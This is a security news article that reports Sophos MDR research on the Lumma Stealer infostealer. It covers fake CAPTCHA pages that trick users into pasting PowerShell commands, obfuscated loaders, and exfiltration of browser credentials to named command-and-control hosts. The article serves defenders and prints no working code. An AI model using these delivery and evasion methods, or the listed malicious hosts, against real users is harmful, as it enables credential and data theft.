Lumma Stealer Upgraded with PowerShell Tools and Advanced Evasion Techniques
Sophos Managed Detection and Response (MDR) in September 2024, the notorious Lumma Stealer malware has evolved with sophisticated PowerShell tools and advanced evasion tactics, leveraging fake CAPTCHA sites to deceive users.
Active since mid-2022 and offered as Malware-as-a-Service (MaaS) by a presumed Russian developer, Lumma Stealer targets sensitive data such as passwords, session tokens, cryptocurrency wallets, and personal information.
What makes this latest campaign particularly insidious is its use of social engineering, exploiting user trust in CAPTCHA challenges to execute malicious PowerShell commands, often leading to devastating data theft.
PowerShell-Driven Payloads
Sophos MDR investigations conducted through the fall and winter of 2024-25 reveal the intricate mechanics behind Lumma Stealer’s delivery.
One prominent attack vector involves users being redirected to seemingly legitimate CAPTCHA verification pages that prompt them to paste a malicious PowerShell command into Windows’ Run dialog box or command-line interface.
This command, often hidden behind obfuscated JavaScript, retrieves a script from a remote server, such as “fixedzip.oss-ap-southeast-5.aliyuncs.com,” which then downloads a zipped payload disguised as “ArtistSponsorship.exe.”
According to Sophos Report, this executable drops multiple files, including an obfuscated AutoIt script, into the user’s %temp% directory.
The script connects to command-and-control (C2) servers like “snail-r1ced.cyou” (IP 104.21.84.251 via Cloudflare) to exfiltrate stolen data, including Chrome login credentials and cookies, with alarming precision.
In one observed case, a mere 6.37MB file of sensitive data was successfully transmitted before the process self-terminated.
Another variant involves tricking users into opening a supposed PDF file that is actually a remotely hosted .lnk shortcut, triggering a deeply obfuscated PowerShell script.
This script uses AES encryption and dynamic API resolution with tools like CyberChef revealing a portable executable (PE) file designed to download further payloads while masking its intent through layers of base64 encoding and deceptive file paths in %appdata%.
The complexity of these evasion techniques, including dynamic loading of malicious code via .NET’s System.Reflection.Assembly class and the use of legitimate-looking IRS PDFs as decoys, underscores the stealer’s ability to bypass traditional defenses.
A Growing Threat Landscape for Defenders
The adaptability of Lumma Stealer’s delivery methods poses a significant challenge for cybersecurity defenders.
Reports from Netskope Threat Labs estimate around 5,000 fake CAPTCHA sites may be active in this campaign, amplifying the threat’s reach.
However, the evolving tactics-combining user manipulation with technical sophistication-highlight the need for robust endpoint protection and user education.
Reversing years of ingrained trust in CAPTCHA prompts is a daunting task, but it’s critical as attackers continue to exploit this familiarity.
As Lumma Stealer remains a pervasive threat in 2025, organizations must deploy advanced behavioral analysis and scrutinize network activity for signs of C2 communication or data exfiltration to stay ahead of this cunning infostealer.